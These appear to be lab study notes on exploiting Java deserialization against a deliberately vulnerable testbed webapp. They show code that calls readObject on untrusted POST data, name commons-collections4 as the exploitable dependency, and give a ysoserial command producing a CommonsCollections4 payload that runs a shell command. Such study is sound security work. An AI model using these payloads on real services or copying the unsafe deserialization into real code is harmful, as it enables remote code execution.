Summary

Structure

$ javac POC.java ; java POC
POC Serialized object saved to serialized.object

hexdump -C serialized.object

The starting bytes, ac ed 00 05 are a known signature for JAVA serialized objects. (rO0 Base64-Encoded)

Practising with Ysoserial

GitHub - hvqzao/java-deserialize-webapp: Vulnerable webapp testbedGitHub

Entry point

Servlet.java:38 Serial.fromBase64(data);

This line is calling the classSerial, loaded from Serial.java passing the data taken from the POST "data" parameter.

Serial Class

public class Serial {

	public static Object fromBase64(String s) throws IOException, ClassNotFoundException {
		byte[] data = new Base64().decode(s);
		ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
		Object o = ois.readObject();
		ois.close();
		return o;
	}

	public static String toBase64(Serializable o) throws IOException {
		ByteArrayOutputStream baos = new ByteArrayOutputStream();
		ObjectOutputStream oos = new ObjectOutputStream(baos);
		oos.writeObject(o);
		oos.close();
		return new Base64().encodeToString(baos.toByteArray());
	}
}

Decoding Base64-encoded object

byte[] data = new Base64().decode(s);

Reading Object

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
Object o = ois.readObject();

At this time, using readObject(), the object is loaded.

Identifying vulnerable loaded classes

This webapp is compiled with commons-collections4:4.0 specified on its classpath. (target/bin/webapp:80) and it is also listed in ysoserial's vulnerable classes list.

Ysoserial payload generation

java -jar ysoserial.jar CommonsCollections4 'touch /tmp/worked'